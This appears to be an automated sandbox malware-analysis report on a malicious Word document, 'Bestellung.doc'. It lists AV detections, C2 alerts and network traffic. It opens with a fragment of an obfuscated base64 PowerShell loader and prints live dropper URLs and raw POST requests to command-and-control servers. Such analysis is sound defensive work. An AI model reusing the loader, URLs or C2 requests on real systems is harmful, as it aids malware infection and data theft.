zACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcAbgAnACkAKwAoACcALgBlAHUAJwArACcALwB3AHAALQBjACcAKwAnAG8AbgAnACsAJwB0AGUAbgB0AC8AYgBuADEASQBnACcAKwAnAEQAZQBqAGgALwAhACcAK

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus detection for URL or domainShow sources
                      Source: http://nightlifemumbai.club/x/0wBD3/Avira URL Cloud: Label: malware
                      Source: https://shop.nowfal.dev/wp-includes/RlMObf2j0/Avira URL Cloud: Label: malware
                      Source: https://jflmktg.wpcomstaging.com/wp-content/AK/Avira URL Cloud: Label: malware
                      Source: https://shop.nowfal.devAvira URL Cloud: Label: malware
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: shop.nowfal.devVirustotal: Detection: 7%Perma Link
                      Source: e-wdesign.euVirustotal: Detection: 5%Perma Link
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: Bestellung.docVirustotal: Detection: 53%Perma Link
                      Source: Bestellung.docReversingLabs: Detection: 11%
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_004096ED CryptDecodeObjectEx,

                      Compliance:

                      barindex
                      Uses insecure TLS / SSL version for HTTPS connectionShow sources
                      Source: unknownHTTPS traffic detected: 104.21.88.166:443 -> 192.168.2.22:49168 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 212.227.200.73:443 -> 192.168.2.22:49171 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 192.0.78.20:443 -> 192.168.2.22:49172 version: TLS 1.0
                      Uses new MSVCR DllsShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Binary contains paths to debug symbolsShow sources
                      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2103436602.000000001B860000.00000002.00000001.sdmp
                      Source: Binary string: <ystem.pdb source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: global trafficDNS query: name: nightlifemumbai.club
                      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.88.166:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.217.6.174:80

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2404322 ET CNC Feodo Tracker Reported CnC Server TCP group 12 192.168.2.22:49174 -> 190.55.186.229:80
                      Source: TrafficSnort IDS: 2404326 ET CNC Feodo Tracker Reported CnC Server TCP group 14 192.168.2.22:49175 -> 203.157.152.9:7080
                      Source: TrafficSnort IDS: 2404308 ET CNC Feodo Tracker Reported CnC Server TCP group 5 192.168.2.22:49176 -> 157.245.145.87:443
                      Source: TrafficSnort IDS: 2404306 ET CNC Feodo Tracker Reported CnC Server TCP group 4 192.168.2.22:49177 -> 132.248.38.158:80
                      Source: TrafficSnort IDS: 2404302 ET CNC Feodo Tracker Reported CnC Server TCP group 2 192.168.2.22:49179 -> 110.172.180.180:8080
                      Potential dropper URLs found in powershell memoryShow sources
                      Source: powershell.exe, 00000005.00000002.2100518545.00000000039D4000.00000004.00000001.sdmpString found in memory: http://nightlifemumbai.club/x/0wBD3/!https://shop.nowfal.dev/wp-includes/RlMObf2j0/!http://e-wdesign.eu/wp-content/bn1IgDejh/!http://traumfrauen-ukraine.de/bin/JyeS/!https://jflmktg.wpcomstaging.com/wp-content/AK/!https://linhkienmaytinh.tctedu.com/wp-snapshots/VzJM/
                      Source: powershell.exe, 00000005.00000002.2103838754.000000001CE40000.00000002.00000001.sdmpString found in memory: Autoplay,http://go.microsoft.com/fwlink/?LinkId=30564-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=131536-http://go.microsoft.com/fwlink/?LinkId=131535+http://go.microsoft.com/fwlink/?LinkId=8430
                      Source: powershell.exe, 00000005.00000002.2103838754.000000001CE40000.00000002.00000001.sdmpString found in memory: PRODUCT_KEY_PROBLEMS$ACTIVATION_TYPE_KEY_FIND_PRODUCT_KEY)ACTIVATION_TYPE_DIFF_KEY_FIND_PRODUCT_KEY+ACTIVATION_CHNG_TO_LICENSE_FIND_PRODUCT_KEYPA,ACTIVATION_PERIOD_EXPIRED_WHAT_IS_ACTIVATION-ACTIVATION_LICENSE_EXPIRED_WHAT_IS_ACTIVATION,ACTIVATION_LICENSE_EXPIRED_PRIVACY_STATEMENTPA,http://go.microsoft.com/fwlink/?LinkID=90983-http://go.microsoft.com/fwlink/?LinkId=123784PA$E77344FA-E978-464C-953E-EBA44F0522670ACTIVATION_ERROR_INSTALLING_REINSTALLING_WINDOWS$f3b8150b-0bd1-4fec-8283-7a1dd45c16377ACTIVATION_ERROR_REINSTALL_WINDOWS_CREATE_RESTORE_POINTPA-http://go.microsoft.com/fwlink/?LinkId=100109-http://go.microsoft.com/fwlink/?LinkId=100096-http://go.microsoft.com/fwlink/?LinkId=120830-http://go.microsoft.com/fwlink/?LinkId=120831,http://go.microsoft.com/fwlink/?LinkId=89429
                      Source: powershell.exe, 00000005.00000002.2104020286.000000001D027000.00000002.00000001.sdmpString found in memory: Ease of Access Centero<a href="http://go.microsoft.com/fwlink/?linkid=63345">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63353">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63363">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63367">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63370">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63373">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63376">Learn about additional assistive technologies online</a>PA!Make your computer easier to use.BGet recommendations to make your computer easier to use (eyesight)CGet recommendations to make your computer easier to use (dexterity)AGet recommendations to make your computer easier to use (hearing)
                      Source: powershell.exe, 00000005.00000002.2104020286.000000001D027000.00000002.00000001.sdmpString found in memory: Get recommendations to make your computer easier to use (speech)CGet recommendations to make your computer easier to use (cognitive)"Use the computer without a display
                      Source: powershell.exe, 00000005.00000002.2104020286.000000001D027000.00000002.00000001.sdmpString found in memory: normal/http://images.metaservices.microsoft.com/cover/6http://redir.metaservices.microsoft.com/redir/buynow/?1http://redir.metaservices.microsoft.com/dvdcover/PA6http://redir.metaservices.microsoft.com/redir/buynow/?,http://windowsmedia.com/redir/findmedia.asp?9http://redir.metaservices.microsoft.com/redir/getmdrdvd/?8http://redir.metaservices.microsoft.com/redir/getmdrcd/?Bhttp://redir.metaservices.microsoft.com/redir/getmdrcdbackground/??http://redir.metaservices.microsoft.com/redir/getmdrcdposturl/?Ihttp://redir.metaservices.microsoft.com/redir/getmdrcdposturlbackground/?=http://redir.metaservices.microsoft.com/redir/getdaiposturl/?:http://redir.metaservices.microsoft.com/redir/daifailure/?
                      Source: powershell.exe, 00000005.00000002.2104020286.000000001D027000.00000002.00000001.sdmpString found in memory: Microsoft Corporation/(C) Microsoft Corporation. All rights reserved.9http://redir.metaservices.microsoft.com/redir/submittoc/?-http://windowsmedia.com/redir/QueryTOCExt.asp1res://wmploc.dll/Offline_MediaInfo_NowPlaying.htm7http://redir.metaservices.microsoft.com/redir/buynowmg/,http://windowsmedia.com/redir/buyticket9.asp)http://windowsmedia.com/redir/IDPPage.asp)http://windowsmedia.com/redir/IDPLogo.asp
                      Source: powershell.exe, 00000005.00000002.2104020286.000000001D027000.00000002.00000001.sdmpString found in memory: AMG Rating: %s stars:http://redir.metaservices.microsoft.com/redir/mediaguide/?9http://redir.metaservices.microsoft.com/redir/radiotuner/,http://windowsmedia.com/redir/QueryTOCNP.asp#Show Video and Visualization Window9http://redir.metaservices.microsoft.com/redir/dvddetails/9http://redir.metaservices.microsoft.com/redir/dvdwizard/?PA
                      Source: powershell.exe, 00000005.00000002.2104020286.000000001D027000.00000002.00000001.sdmpString found in memory: Do you want to switch to it now?
                      Source: powershell.exe, 00000005.00000002.2104020286.000000001D027000.00000002.00000001.sdmpString found in memory: http://www.microsoft.com/windows/windowsmedia/musicservices.aspx?http://redir.metaservices.microsoft.com/redir/allservices/?sv=2?http://redir.metaservices.microsoft.com/redir/allservices/?sv=3?http://redir.metaservices.microsoft.com/redir/allservices/?sv=5PA
                      Uses known network protocols on non-standard portsShow sources
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 7080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 7080 -> 49175
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 203.157.152.9:7080
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 110.172.180.180:8080
                      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 70.32.89.105:8080
                      Source: global trafficHTTP traffic detected: GET /x/0wBD3/ HTTP/1.1Host: nightlifemumbai.clubConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wp-content/bn1IgDejh/ HTTP/1.1Host: e-wdesign.euConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bin/JyeS/ HTTP/1.1Host: traumfrauen-ukraine.deConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 203.157.152.9 203.157.152.9
                      Source: Joe Sandbox ViewIP Address: 132.248.38.158 132.248.38.158
                      Source: Joe Sandbox ViewIP Address: 172.217.6.174 172.217.6.174
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox ViewASN Name: GO-DADDY-COM-LLCUS GO-DADDY-COM-LLCUS
                      Source: Joe Sandbox ViewASN Name: MOPH-TH-APInformationTechnologyOfficeSG MOPH-TH-APInformationTechnologyOfficeSG
                      Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                      Source: global trafficHTTP traffic detected: POST /fp6mnzkaqr6g444l/72u9p3zs7/g2jlp29e1gun28tdsj/98qlj89cyfd5f3jv/gfxmq8g7uq109a/ HTTP/1.1DNT: 0Referer: 203.157.152.9/fp6mnzkaqr6g444l/72u9p3zs7/g2jlp29e1gun28tdsj/98qlj89cyfd5f3jv/gfxmq8g7uq109a/Content-Type: multipart/form-data; boundary=--------------------cs4PSNdop4ezuJ7KDL7qUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 203.157.152.9:7080Content-Length: 6292Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /gjk3j942rq/3t3141347sxz/js59r1n8zph/ HTTP/1.1DNT: 0Referer: 157.245.145.87/gjk3j942rq/3t3141347sxz/js59r1n8zph/Content-Type: multipart/form-data; boundary=--------------dFTqLeLs5G7gBBUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 157.245.145.87:443Content-Length: 5620Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownHTTPS traffic detected: 104.21.88.166:443 -> 192.168.2.22:49168 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 212.227.200.73:443 -> 192.168.2.22:49171 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 192.0.78.20:443 -> 192.168.2.22:49172 version: TLS 1.0
                      Source: unknownTCP traffic detected without corresponding DNS query: 190.55.186.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 190.55.186.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 157.245.145.87
                      Source: unknownTCP traffic detected without corresponding DNS query: 157.245.145.87
                      Source: unknownTCP traffic detected without corresponding DNS query: 157.245.145.87
                      Source: unknownTCP traffic detected without corresponding DNS query: 157.245.145.87
                      Source: unknownTCP traffic detected without corresponding DNS query: 157.245.145.87
                      Source: unknownTCP traffic detected without corresponding DNS query: 157.245.145.87
                      Source: unknownTCP traffic detected without corresponding DNS query: 157.245.145.87
                      Source: unknownTCP traffic detected without corresponding DNS query: 132.248.38.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 132.248.38.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 132.248.38.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 132.248.38.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 132.248.38.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 132.248.38.158
                      Source: unknownTCP traffic detected without corresponding DNS query: 70.32.89.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 70.32.89.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 70.32.89.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 70.32.89.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 70.32.89.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 70.32.89.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 161.49.84.2
                      Source: unknownTCP traffic detected without corresponding DNS query: 161.49.84.2
                      Source: unknownTCP traffic detected without corresponding DNS query: 161.49.84.2
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8AE8CBF3-349E-46EF-BF24-C3A751787722}.tmpJump to behavior
                      Source: global trafficHTTP traffic detected: GET /x/0wBD3/ HTTP/1.1Host: nightlifemumbai.clubConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wp-content/bn1IgDejh/ HTTP/1.1Host: e-wdesign.euConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bin/JyeS/ HTTP/1.1Host: traumfrauen-ukraine.deConnection: Keep-Alive
                      Source: powershell.exe, 00000005.00000002.2103838754.000000001CE40000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100282521.0000000001BD0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099142810.0000000002010000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100145610.0000000002010000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                      Source: powershell.exe, 00000005.00000002.2103224125.000000001B3D4000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                      Source: unknownDNS traffic detected: queries for: nightlifemumbai.club
                      Source: unknownHTTP traffic detected: POST /fp6mnzkaqr6g444l/72u9p3zs7/g2jlp29e1gun28tdsj/98qlj89cyfd5f3jv/gfxmq8g7uq109a/ HTTP/1.1DNT: 0Referer: 203.157.152.9/fp6mnzkaqr6g444l/72u9p3zs7/g2jlp29e1gun28tdsj/98qlj89cyfd5f3jv/gfxmq8g7uq109a/Content-Type: multipart/form-data; boundary=--------------------cs4PSNdop4ezuJ7KDL7qUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 203.157.152.9:7080Content-Length: 6292Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1569Date: Tue, 26 Jan 2021 09:49:02 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: powershell.exe, 00000005.00000003.2095061790.000000001CCA4000.00000004.00000001.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=
                      Source: powershell.exe, 00000005.00000003.2095061790.000000001CCA4000.00000004.00000001.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0
                      Source: powershell.exe, 00000005.00000002.2095505629.00000000001CB000.00000004.00000020.sdmpString found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
                      Source: powershell.exe, 00000005.00000003.2095132892.000000001CCE3000.00000004.00000001.sdmpString found in binary or memory: http://ca.sia.it/seccli/repository/CRL.der0J
                      Source: powershell.exe, 00000005.00000003.2095042856.000000001CC5A000.00000004.00000001.sdmpString found in binary or memory: http://ca.sia.it/secsrv/repository/CRL.der0J
                      Source: powershell.exe, 00000005.00000003.2095272033.000000001B469000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
                      Source: powershell.exe, 00000005.00000002.2103414288.000000001B4C5000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/EncryptionEverywhereDVTLSCA-G1.crt0
                      Source: powershell.exe, 00000005.00000003.2094871839.000000001CC82000.00000004.00000001.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/1604
                      Source: powershell.exe, 00000005.00000003.2095061790.000000001CCA4000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
                      Source: powershell.exe, 00000005.00000003.2095103092.000000001CC68000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
                      Source: powershell.exe, 00000005.00000003.2095103092.000000001CC68000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/publicnotaryroot.html0
                      Source: powershell.exe, 00000005.00000003.2095061790.000000001CCA4000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
                      Source: powershell.exe, 00000005.00000003.2095103092.000000001CC68000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
                      Source: powershell.exe, 00000005.00000003.2095103092.000000001CC68000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/publicnotaryroot.crl0
                      Source: powershell.exe, 00000005.00000003.2095272033.000000001B469000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: powershell.exe, 00000005.00000002.2095505629.00000000001CB000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                      Source: powershell.exe, 00000005.00000003.2095103092.000000001CC68000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/TrustedCertificateServices.crl0:
                      Source: powershell.exe, 00000005.00000003.2095288882.000000001B488000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                      Source: powershell.exe, 00000005.00000003.2095298060.000000001B49C000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                      Source: powershell.exe, 00000005.00000003.2095288882.000000001B488000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                      Source: powershell.exe, 00000005.00000003.2095298060.000000001B49C000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: powershell.exe, 00000005.00000002.2103658864.000000001CC98000.00000004.00000001.sdmpString found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthori
                      Source: powershell.exe, 00000005.00000003.2095067797.000000001CC91000.00000004.00000001.sdmpString found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
                      Source: powershell.exe, 00000005.00000003.2095090679.000000001CC70000.00000004.00000001.sdmpString found in binary or memory: http://crl.oces.certifikat.dk/oces.crl0
                      Source: powershell.exe, 00000005.00000003.2095288882.000000001B488000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                      Source: powershell.exe, 00000005.00000003.2095288882.000000001B488000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                      Source: powershell.exe, 00000005.00000002.2103658864.000000001CC98000.00000004.00000001.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
                      Source: powershell.exe, 00000005.00000003.2095094346.000000001CC8D000.00000004.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
                      Source: powershell.exe, 00000005.00000002.2095505629.00000000001CB000.00000004.00000020.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
                      Source: powershell.exe, 00000005.00000003.2095272033.000000001B469000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
                      Source: powershell.exe, 00000005.00000002.2103563563.000000001CC40000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0L
                      Source: powershell.exe, 00000005.00000003.2095272033.000000001B469000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
                      Source: powershell.exe, 00000005.00000003.2095272033.000000001B469000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
                      Source: powershell.exe, 00000005.00000003.2095272033.000000001B469000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
                      Source: powershell.exe, 00000005.00000003.2095272033.000000001B469000.00000004.00000001.sdmp, powershell.exe, 00000005.00000003.2095128436.000000001CCC2000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: powershell.exe, 00000005.00000002.2103224125.000000001B3D4000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabg
                      Source: powershell.exe, 00000005.00000002.2095497751.00000000001B5000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en:
                      Source: powershell.exe, 00000005.00000002.2100614327.0000000003B0D000.00000004.00000001.sdmpString found in binary or memory: http://e-wdesign.eu
